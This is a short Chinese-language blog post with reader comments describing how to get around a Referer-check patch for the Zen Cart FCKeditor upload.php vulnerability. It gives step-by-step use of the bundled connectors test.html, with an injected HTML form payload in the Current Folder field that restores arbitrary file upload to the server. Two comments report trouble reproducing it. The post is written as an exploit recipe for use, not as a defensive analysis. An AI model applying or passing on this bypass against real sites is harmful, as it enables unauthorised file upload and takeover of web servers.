zencart editors/fckeditor 漏洞修复后的二次利用

漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php 网上给出的修复方案是 修复方法,删除FCK编辑器用其他的编辑器 或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件 在 require(‘config.php’); require(‘util.php’); 的下面添加以下代码—————————– //防止外部提交 function outsidepost() { $servername=$_SERVER['SERVER_NAME']; $sub_from=@$_SERVER['HTTP_REFERER']; $sub_len=strlen($servername); $checkfrom=substr($sub_from,7,$sub_len); if($checkfrom!=$servername){ echo(“you don’t outsidepost!”); exit; } } outsidepost(); 防止外部提交,但是没有防止内部提交, 利用方法: 1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html 2,在Current Folder 框输入 <form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form> 然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。 PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。

2 条评论

  1. 匿名用户

    提示无效文件.

  2. 匿名用户

    出现表单后怎么做? 直接在File Upload 处浏览上传否? 测试了FCKEDIT2.6 PHP

    -
    <CurrentFolder path="/Upload a new file:/" url="/jsj/userfiles/file/Upload a new file:/" />

    这个提示

发表评论